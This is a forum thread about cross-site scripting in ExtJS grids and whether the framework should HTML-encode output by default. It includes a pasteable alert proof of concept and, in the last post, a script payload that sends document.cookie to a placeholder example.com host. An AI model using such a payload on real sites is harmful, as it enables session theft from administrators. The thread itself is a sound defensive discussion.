-
20 Nov 2009 1:42 AM #91
Cleaning up html on entry from the client-side is not the right way to go I think. The big point of cleaning it up is to avoid security issues, and nothing you do client-side on input actually matters security-wise. We use htmlpurifier on the server to clean up html code. We also don't trust anything in the database and always html-encode all output, but we have to html-encode on the client because our server has to be platform-agnostic.
-
21 Nov 2009 5:33 AM #92
I'm sorry to disappoint you, but this approach will make the problem even worse. It only pretends to fix it, giving you false hope for security.
By the way, you simply can't do this kind of validation by disallowing an otherwise legitimate set of characters. Imagine your users being unable to write mathematical expressions with the relational operators < and >, for example: "a < b + c > d". See, I can still post a message with these characters in this vBulletin forum without threatening anyone's security. Or your users will be unable to post HTML code examples because of erroneous validation rules.
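To make the over-blocking concrete, here is a minimal sketch. It assumes a validator that rejects any value changed by a naive tag-stripping regex. The names TAG_RE, stripTagsNaive and looksLikeMarkup are hypothetical and are not ExtJS API; a real validator may behave differently.

```javascript
// Hypothetical naive tag pattern: "<", an optional "/", then anything up to the next ">".
const TAG_RE = /<\/?[^>]+>/g;

// Remove everything the naive pattern considers a tag.
function stripTagsNaive(value) {
  return String(value).replace(TAG_RE, "");
}

// Flag a value as markup if stripping "tags" changes it.
function looksLikeMarkup(value) {
  return stripTagsNaive(value) !== String(value);
}

console.log(looksLikeMarkup('<script>alert("x");</script>')); // true
console.log(looksLikeMarkup("a < b + c > d")); // true, because "< b + c >" matches the pattern
console.log(looksLikeMarkup("a < b")); // false, there is no closing ">"
```

Under these assumptions the harmless inequality is rejected together with the script tag, which is the kind of erroneous validation rule described above.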
The only real solution to the XSS problem is to encode user data properly where it gets rendered in HTML -- in ExtJS widgets. This rule has to be applied systematically to every single ExtJS widget. It's been said here so many times, but still...
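As a rough illustration of encoding at render time, here is a minimal sketch of an HTML-encoding helper in plain JavaScript. The names HTML_ESCAPES and encodeHtml are hypothetical; ExtJS ships Ext.util.Format.htmlEncode for the same job, and this sketch does not claim to match its exact output.

```javascript
// Hypothetical helper: escape the characters that are significant in HTML text
// and in quoted attribute values.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(encodeHtml("a < b + c > d"));
// a &lt; b + c &gt; d
console.log(encodeHtml('<script>alert("hi");</script>'));
// &lt;script&gt;alert(&quot;hi&quot;);&lt;/script&gt;
```

The user's text is kept exactly as typed; only its representation in the HTML output changes, so the browser displays it instead of interpreting it.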
-
21 Nov 2009 5:51 AM #93
By the way, here is a simple demonstration of the vulnerability.
Open the Editor Grid Example in your browser. Please prefer Firefox for now. Try editing any of the grid cells and paste the following piece of code verbatim into it:
Code:
<script>alert("you've been hacked!");</script>
Unfocus the cell to complete editing and watch a nasty thing happen to your browser.
You can experiment with other tags as well. For more fun, try:
Code:
<plaintext>
Please note that this is purely client side application, it does not talk to the server at all.
No HTML purifier running on the server will prevent this problem.
EDIT:
I quoted joeri's message, but after rereading it I'm not sure I understood him correctly, so I removed the quote.
Last edited by caustic; 21 Nov 2009 at 9:03 AM. Reason: Removed joeri's quote.
-
21 Nov 2009 7:18 AM #94
@caustic -- I'm far from disappointed (and frankly, glad we can all swap ideas).
The point of the post was to point out that there are ways of handling the dangers from several fronts.
On the input side (for those who feel that could be a risk vector), Vtype validation is but one tool at your disposal. The validation function could easily be hardened/softened with something as simple as:
Code:
// safeAlphanumRe is not shown in this post; it is assumed to be defined elsewhere
Ext.apply(Ext.form.VTypes, {
    safeAlphanum: function(value, field){
        if(safeAlphanumRe.test(value)){ // might there be a problem here?
            return value == Ext.util.Format.stripTags(value);
        }
        return true;
    },
    safeAlphanumMask : /[a-z0-9_]/i, // allowed initial character input for mathematicians
    safeAlphanumText : 'This field should only contain letters, numbers, _, and NO markup'
});
That handles both of these with grace:
Code:
<script>alert("you've been hacked!");</script>
"a < b + c > d"
It's all about implementation choices (and custom Vtypes are a flexible way to address the varied input requirements). In fact, all your VTypes could be chained to one like the above.
What you are proposing on the surface is commendable and makes absolute sense!
If you are implying the framework should do it for you, think about what that would do to:
Ext.Updater (for those who persist in the notion that raw markup with inline scripts to build components is the right way to go).
Should a major piece of functionality like that be crippled by a systemic lockdown by the framework itself (beyond what the default loadScripts:false already does)?
What else might qualify (beyond inline <script>s) as undesirable markup? Perhaps a hidden Form? Should a framework search and destroy those?
(All JS Frameworks of consequence have XSS risk here!)
How does the developer mitigate risk here? He/she implements an appropriate custom renderer based on the use-context (and the trusted-source) of the content.
The framework can't make that decision, can it?
Any 'renderer' COULD/SHOULD implement something comparable to stripTags, but again, the only person that could possibly decide where and when to 'harden' those is the developer.
Ext has the requisite flexibility to handle these where appropriate. We just need to work on a set of best-practice recommendations -- again.
"be dom-ready..."
Doug Hendricks
-
23 Nov 2009 12:33 AM #95
@hendricd: you're making this argument into something it's not.
The argument is not what choices the developer can make, it's what defaults for those choices are made for them by the framework. Raw renderers are imho the wrong way to go in the majority of cases, so to me it doesn't make sense to default to that behavior. Why should it require conscious effort to get the "correct" behavior and no effort to get the wrong behavior? Why can't it be the other way around, that Ext.Updater by default tries to prevent mayhem, and a user has to set a flag to not make it do that? Same thing with the grid column renderer, why can't that default to "safe" behavior and require an active effort to switch to "unsafe" behavior?
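A minimal sketch of what "safe by default, unsafe by opt-in" could look like for a column renderer. Everything here is hypothetical: makeRenderer and the allowHtml flag are illustrative names, not an existing ExtJS option.

```javascript
// Hypothetical encoder, repeated here so the sketch is self-contained.
function encodeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical factory: wraps an optional renderer so that its output is
// HTML-encoded unless the caller explicitly passes { allowHtml: true }.
function makeRenderer(renderer, options) {
  const allowHtml = Boolean(options && options.allowHtml);
  return function (value) {
    let out = renderer ? renderer.apply(this, arguments) : value;
    if (out === null || out === undefined) {
      out = "";
    }
    return allowHtml ? String(out) : encodeHtml(out);
  };
}

// No effort gives the safe behavior.
const plainCell = makeRenderer();
// Markup requires a conscious opt-in, and the renderer encodes the data itself.
const boldCell = makeRenderer((v) => "<b>" + encodeHtml(v) + "</b>", { allowHtml: true });

console.log(plainCell('<script>alert("x")</script>'));
// &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
console.log(boldCell("<i>"));
// <b>&lt;i&gt;</b>
```

With this shape, forgetting the flag costs a developer some formatting rather than a security hole.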
-
23 Nov 2009 10:56 AM #96
Since I have rekindled this debate, I figure I should weigh in again on this. I will do so by sharing my opinions, which I hope will further explain why I feel Ext should change its behavior.
Point #1: Data should be persisted in a raw format because we can't assume how it will be rendered later
Let's take for example an online HTML quiz that asks the question: "Please provide an example of a JavaScript Include", to which the proper answer would be:
Code:
<script type="text/javascript" src="http://www.example.com/example.js"></script>
What some people here are arguing is that before persisting the answer to this question to storage (such as a database), we should HTML encode this string into its "secure" format for later HTML rendering:
Code:
&lt;script type="text/javascript" src="http://www.example.com/example.js"&gt;&lt;/script&gt;
This works great if the only renderer of our data is an HTML-aware platform, but what if we later have to render that data to a text-only format such as a terminal? Now every other presentation layer has to be HTML-aware so that it can first de-HTML the data before rendering it.
The problem here is two-fold:
- We have coupled the data layer and the presentation layer by forcing the data layer to be aware of how the data will eventually be used. Even worse, we have forced it into supporting only one possible presentation layer!
- We have coupled each presentation layer to the single presentation layer that the data layer is now pre-encoding for.
What should be happening is that the system should accept all valid data and allow each presentation layer to decide how it needs to encode data based on its own requirements. This allows every component of the application to be blissfully unaware of the others. The data layer simply persists data as provided, and each presentation layer processes the raw data according to its own needs.
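A minimal sketch of this separation, assuming two presentation layers that read the same raw stored value. The function names renderHtmlCell and renderTerminalLine are hypothetical, as is the choice of what the terminal layer needs to strip.

```javascript
// The raw quiz answer, stored exactly as the user provided it.
const storedAnswer = '<script type="text/javascript" src="http://www.example.com/example.js"></script>';

// Hypothetical encoder used only by the HTML layer.
function encodeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HTML presentation layer: encodes for HTML at the moment of rendering.
function renderHtmlCell(raw) {
  return "<td>" + encodeHtml(raw) + "</td>";
}

// Text presentation layer: knows nothing about HTML. In this sketch its own
// requirement is assumed to be dropping control characters.
function renderTerminalLine(raw) {
  return "Answer: " + String(raw).replace(/[\x00-\x1f\x7f]/g, "");
}

console.log(renderHtmlCell(storedAnswer));
console.log(renderTerminalLine(storedAnswer));
```

Neither layer has to undo work done for the other, because the stored value was never encoded for either of them.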
A real world example
The project I am working on exposes a public set of web services that aggregate data from various sources. What people are proposing on here is that I should HTML encode this data either when it is saved, or as it is sent as a response from the web server. This is silly because I can not assume that the consumers of my web services are HTML rendering agents or even HTML aware. It is up to the consumers to know how they will be presenting the data from my web service and displaying it as they see fit.
-
23 Nov 2009 11:01 AM #97
Point #2: Valid is different than secure
A few people have brought up the red herring of "Well we filter for SQL Injection, so this is no different." This is wrong.
If I ask the question on a form: "Please show an example of a valid SQL Select Statement", a completely valid answer to that question is:
Code:
SELECT u.* FROM dbo.users AS u WHERE u.active = 1
That is VALID input, but it is not SECURE input. My data layer will need to protect itself from SQL injection attacks by properly handling its queries and the arguments that go into them, but it will not by any means be sanitizing that string.
Likewise, just because the answer to the previous example question is not SECURE, doesn't mean it is not 100% VALID. In that case it is only insecure in one presentation layer, the job of which it would be to secure it.
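A minimal sketch of "properly handling queries and their arguments", assuming a driver that accepts SQL text with placeholders plus a separate list of values. The table name answers, the function buildInsertAnswer, and the "?" placeholder syntax are all hypothetical; real drivers differ in placeholder style.

```javascript
// Hypothetical parameterized statement: the SQL text is fixed, and the user's
// answer travels separately as data, so it is never parsed as SQL.
function buildInsertAnswer(questionId, answerText) {
  return {
    text: "INSERT INTO answers (question_id, body) VALUES (?, ?)",
    params: [questionId, answerText],
  };
}

const userAnswer = "SELECT u.* FROM dbo.users AS u WHERE u.active = 1";
const statement = buildInsertAnswer(7, userAnswer);

console.log(statement.text);
// INSERT INTO answers (question_id, body) VALUES (?, ?)
console.log(statement.params[1] === userAnswer);
// true
```

The answer is stored unmodified and nothing is sanitized; the data layer is protected because the value is never concatenated into the statement.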
-
23 Nov 2009 11:12 AM #98
Point #3: All systems should default-to-secure, and since Ext is primarily an HTML rendering layer, it should default-to-HTML Encode its data unless explicitly told not to.
I don't really have much to discuss on this point, I think the point itself contains the argument.
The only argument against this really is that it may break backwards compatibility, but due to the potentially severe security flaws related to this and the relative ease to fix the compatibility problems I believe it would be the right path to take.
-
23 Nov 2009 11:18 AM #99
Those are the main points I have for now, I'm seriously hoping that the Ext development team starts looking at this problem again and takes it seriously.
I'm really saddened to see how few of the posters in this thread even understand the issue, regardless of whether they want to take action on it.
-
23 Nov 2009 11:26 AM #100
That is exactly what I am saying. But note that it's not the AJAX layer that should be encoding, it's the presentation layer (Column Renderers, Panel Bodies, Message Boxes, etc.)
In this case Ext is the presentation layer, and the presentation layer should never, ever blindly accept and trust the data it receives from the data layer unless explicitly told to.
Real world example:
Every time a user types a search term into the search box on the front-end, that search is saved to a table.
In the admin there is an Ext grid that constantly refreshes to display recent search terms.
With the default Ext behavior, a user could input this as a search term:
Code:
<script type="text/javascript">
var img = document.createElement('img');
img.src = 'http://www.example.com/evilscript.php?cookie=' + document.cookie;
document.getElementsByTagName('body')[0].appendChild(img);
</script>
At which point the next admin to view the grid of search terms (which would blindly pass along the raw data) would have their cookies stolen, potentially giving the attacker access to their account.
We can not pre-HTML-encode the data as we also export the lists of search terms in TEXT based formats.
I hope this helps.




